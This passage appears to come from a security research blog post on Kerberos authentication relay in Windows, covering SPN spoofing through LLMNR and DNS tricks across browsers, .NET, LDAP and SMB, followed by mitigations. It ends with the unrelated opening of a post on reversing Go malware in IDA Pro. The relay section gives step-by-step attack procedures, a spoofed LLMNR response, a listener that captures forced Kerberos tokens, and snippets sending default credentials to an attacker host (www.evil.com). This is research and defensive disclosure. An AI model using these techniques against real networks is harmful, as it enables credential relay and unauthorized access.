For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com, which redirects to fileserver.domain.com the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com which is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. As in, normally you'd want to spoof the DNS name of an existing host, in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care, you can induce a client to connect to an unregistered host name which will fallback to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain as the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim into using IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds with an address record whose hostname is the SPN target to spoof and whose IP address is the attacker-controlled server.
  4. The WinINET client takes the spoofed canonical name, prefixes it with the HTTP service class to form the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (whose real address is not 10.0.0.80), is shown below:

Link-local Multicast Name Resolution (response)
    Transaction ID: 0x910f
    Flags: 0x8000 Standard query response, No error
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
        evilhost: type A, class IN
            Name: evilhost
            [Name Length: 8]
            [Label Count: 1]
            Type: A (Host Address) (1)
            Class: IN (0x0001)
    Answers
        fileserver.domain.com: type A, class IN, addr 10.0.0.80
            Name: fileserver.domain.com
            Type: A (Host Address) (1)
            Class: IN (0x0001)
            Time to live: 1 (1 second)
            Data length: 4
            Address: 10.0.0.80

You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext
PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"
PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to downgrade to a Kerberos-only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled, even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example, you can set a document template located at an HTTP URL which, if in the Intranet zone, will generate local Windows authentication just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However, these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.
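
These are standard Internet Explorer feature controls, so they're set in the registry on a per-process basis. A minimal sketch of enabling one for a specific client (the executable name here is purely illustrative):

PS> $key = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149'
PS> New-Item -Path $key -Force | Out-Null
PS> Set-ItemProperty -Path $key -Name 'example_client.exe' -Value 1 -Type DWord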

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell, the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be in the Intranet zone; however, the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV, WinHTTP handles a WWW-Authenticate header of Kerberos; however, it ends up using the Negotiate package regardless, and so Integrity will always be enabled. It also enables Kerberos delegation automatically, like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This also works with local DNS resolution, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If it is disabled then neither local DNS resolution nor public DNS will work, as Chromium will use the host specified in the URL for the SPN.
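
The policy in question is DisableAuthNegotiateCnameLookup. A sketch of enabling it for Chrome via the registry (Edge has an equivalent policy under its own Policies key):

PS> New-Item -Path 'HKLM:\SOFTWARE\Policies\Google\Chrome' -Force | Out-Null
PS> Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Google\Chrome' -Name 'DisableAuthNegotiateCnameLookup' -Value 1 -Type DWord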

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is that the time before the DNS server will refresh its records is at least 180 seconds. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short, the domain's DNS server will re-request the record and we can return different responses without waiting for the DNS server to update from LDAP. This is very similar to a DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: it seems to be the only browser which still supports URL-based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication, then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can always be generated as it doesn't require any proof that the password is valid, whereas Kerberos requires the password to be correct for the authentication to succeed. You need to specify the domain name when authenticating, so you use a URL of the form http://DOMAIN%5CUSER:PASSWORD@www.evil.com.

One other quirk of this is that you can specify a fully qualified domain name (FQDN) and user name, and the Windows Kerberos implementation will try to authenticate using that domain based on the DNS SRV records. For example http://EVIL.COM%5CUSER:PASSWORD@www.evil.com will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally, and the general conclusion was that this behavior is by design, as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled, it works with both local DNS resolution and public DNS, as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium, there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object, as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set, the client will automatically authenticate using Windows authentication to any host; it doesn't seem to care whether that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");
request.UseDefaultCredentials = true;
var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function, which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not the public DNS resolution attack. If you follow the code, it does support doing a second DNS lookup if the host is undotted, however as far as I can tell this only happens if the client code sets an explicit Host header. Note that the code is slightly different in .NET 2.0, which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA
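
To see this in action you can stand up a trivial listener which returns the stub token and then captures the resulting Authorization header. A minimal sketch (run elevated; the port is arbitrary, and Kerberos will only be selected if an SPN can be obtained for the host the client connected to):

PS> $listener = [System.Net.HttpListener]::new()
PS> $listener.Prefixes.Add('http://+:8080/')
PS> $listener.Start()
PS> $context = $listener.GetContext()    # initial anonymous request
PS> $context.Response.StatusCode = 401
PS> $context.Response.AddHeader('WWW-Authenticate', 'Negotiate AAFA')
PS> $context.Response.Close()
PS> $context = $listener.GetContext()    # retried request
PS> $context.Request.Headers['Authorization']    # Negotiate <base64 Kerberos AP_REQ>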

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set its UseDefaultCredentials property as shown below, or, if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();
handler.UseDefaultCredentials = true;
var client = new HttpClient(handler);
await client.GetStringAsync("http://www.evil.com");

Unless the client specifies an explicit Host header in the request, the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection, so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS rather than an anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent                      LLMNR  DNS CNAME  Delegation  Integrity
Internet Explorer 11 (WinINET)  Yes    No         Yes         Yes
WebDAV (WinHTTP)                Yes    No         Yes         Yes
Chromium (M93)                  Yes    Yes        No†         Yes
Firefox 91                      Yes    Yes        No†         Yes
.NET Framework 4.8              Yes    No‡        Yes         No
.NET 5.0                        Yes    Yes        No          No
.NET 6.0                        Yes    Yes        No          Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name, as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be usable cross-platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built automatically from the canonical name returned by the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. This will usually return an address record alongside; all it does is change the server resolution process, which doesn't seem to give any advantage for exploitation.
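
For example, you can query the record directly (a sketch, reusing the hypothetical domain.com domain from earlier):

PS> Resolve-DnsName -Name '_ldap._tcp.domain.com' -Type SRV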

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication, the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled, so that the server won't auto-detect the signing capability from the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing, the client can be forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection, it'll be enabled on the client, which in turn will automatically enable it on the server. Once this policy is enabled, changing the value of LDAP_OPT_SIGN in the client has no effect.
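
A sketch of checking the policy on a client (this maps to the LDAP client signing requirements setting; a value of 2 requires signing):

PS> Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LDAP' -Name 'LdapClientIntegrity'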

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work; however, even with the flag set I've not found a way of setting an arbitrary SPN value remotely.
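
You can inspect any UNC hardening rules configured via Group Policy in the registry (a sketch; note that, as mentioned, SYSVOL and NETLOGON are protected by default even if no explicit entries are present):

PS> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\NetworkProvider\HardenedPaths'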

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is; however, that's not the case. Instead, for the hostname fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption was that this information would be stripped off before being passed to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However, SspiExProcessSecurityContext doesn't care about the unmarshalled results; instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore, before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as it potentially gives a way of spoofing a hostname which is distinct from the real target service, but which, when processed by the SSPI API, requests the spoofed service ticket. That is, if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and the client appends a service class to the name and passes it to SSPI, it will get a service ticket for fileserver, while the DNS resolution can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid: the last 6 characters are an encoded length of the entire marshaled buffer, and the buffer is prefixed with a 28 byte header with the magic value 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present, then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as-is, which will subsequently fail to get a Kerberos ticket for the SPN.

The easiest way for the name to become invalid is by being converted to lowercase. DNS is case-insensitive, but servers are generally case-preserving, so you could look up the case-sensitive name and the DNS server would return it unmodified. However, the HTTP clients tested all seem to lowercase the hostname before use, so by the time it's used to build an SPN it's a different string. When unmarshalling, 'a' and 'A' represent different binary values, and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single label in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long, leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters, so as long as there's an SPN for that shorter name registered it should be sufficient. However, if there's no short SPN name registered then it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However, it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value, so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer, and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 comes from WEBCAM, which results in a DNS name at least 264331 characters long, somewhat above the 255 character limit usually considered valid for an FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET, set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers, such as SMB and IIS with EPA, can be configured to validate the SPN. If this request attribute flag is set then, while the authentication will succeed, when the server goes to check the SPN it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I haven't investigated every possible network protocol which might perform Kerberos authentication, nor have I looked at non-Windows systems which might support Kerberos, such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced, as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

AlphaGolang | A Step-by-Step Go Malware Reversing Methodology for IDA Pro

21 October 2021 at 14:12

The increasing popularity of Go as a language for malware development is forcing more reverse engineers to come to terms with the perceived difficulties of analyzing these gargantuan binaries. The language offers great benefits for malware developers: portability of statically-linked dependencies, speed of simple concurrency, and ease of cross-compilation. On the other hand, for analysts, it’s meant learning the inadequacies of our tooling and contending with a foreign programming paradigm. While our tooling has generally improved, the perception that Go binaries are difficult to analyze remains. In an attempt to further dispel that myth, we’ve set out to share a series of scripts that simplify the task of analyzing Go binaries using IDA Pro with a friendly methodology. Our hope is that members of the community will feel inspired to share additional resources to bolster our collective analysis powers.

A Quick Intro to the Woes of Go Binary Analysis

Go binaries present multiple peculiarities that make our lives a little harder. The most obvious is their size. Due to the approach of statically linking dependencies, the simplest Go binary is multiple megabytes in size, and one with proper functionality can sit in the 15-20MB range. The binaries are then easily stripped of debug symbols and can be UPX packed to mask their size quite effectively. That bulky size entails a maze of standard code that leads reverse engineers down long unproductive rabbit holes, steering them away from the sparse user-generated code that implements the actual functionality.

Hello World source code
Mach-o binary == 2.0mb
UPX compressed == 1.1mb

To make things worse, Go doesn't null-terminate strings. The linker places strings in incremental order of length, and functions load these strings with a reference to a fixed length. That's a much safer implementation, but it means that even a cursory glance at a Go binary involves dealing with giant blobs of unrelated strings.

“Hello World!” string lost in a sea of unrelated strings.

Even the better disassemblers and decompilers tend to display these unparsed string blobs, obscuring their intended purpose.

Autoanalysis output

Manually fixed disassembly

That’s without getting into the complexities of recovering structures, accurately portraying function types, interfaces, and channels, or properly tracing argument references.

The issue of arguments should prove disturbing for our dynamic analyst friends who were hoping that a debugger would spare them the trouble of manual analysis. While a debugger certainly helps determine arguments at runtime, it’s important to understand how indirect that runtime is. Go is peculiar in allocating a runtime stack owned by the caller function that will in turn handle arguments and allow for multiple return values. For us it translates into a mess of runtime function prologues before any meaningful functionality. Good luck navigating that without symbols.

Improving the Go Reversing Experience

With all those inadvertent obstacles in mind, it’s perfectly understandable that reversers dreaded analyzing Go binaries. However, the situation has changed in the past few years and we should reassess our collective abhorrence of Go malware. Different disassemblers and decompilers have stepped up their Go support. BinaryNinja and Cerbero have improved their native support for Go and there are now standalone frameworks like GoRE that offer good functionality depending on the Go compiler version and can even help support other projects like radare2.

We’ll be focusing on IDA Pro. With the advent of version 7.6, IDA’s native support of Go binaries is drastically better and we’ll be building features on top of this. For folks stuck on v7.5 or lower, we’ll also provide some help by way of scripts but the full functionality of AlphaGolang is unlocked with 7.6 due to some missing APIs (specifically the ida_dirtree API for the new folder tree view). This isn’t the first time brave souls in the community have attempted to improve the Go reversing experience for IDA. However, those projects were largely monolithic labors of love by their original authors and given the fickle nature of IDA’s APIs, once those authors got busy, the scripts fell into disrepair. We hope to improve that as well.

AlphaGolang

